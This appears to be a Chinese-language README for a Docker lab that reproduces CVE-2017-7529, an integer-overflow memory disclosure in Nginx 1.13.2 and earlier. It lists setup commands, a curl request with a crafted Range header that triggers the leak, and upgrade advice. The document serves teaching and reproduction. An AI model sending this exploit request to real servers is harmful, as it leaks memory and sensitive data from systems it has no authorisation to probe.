Nginx 是一款高性能 Web 服务器,也是一款广泛使用的开源 Web 服务器,常用于反向代理、缓存服务器等。
在 Nginx 1.13.2 及更低版本中,存在一个因整数溢出导致的漏洞,攻击者可通过操纵 Range 头,泄露超出原始响应范围的内存片段或敏感信息。
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
该漏洞仅通过简单的 HTTP 请求即可引发信息泄露(Information Disclosure)。
如果其中包含敏感的配置信息或其他可泄露的数据,则可能导致严重的安全事故。
补丁:建议升级至 Nginx 1.13.3 或更高版本
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- 본 문서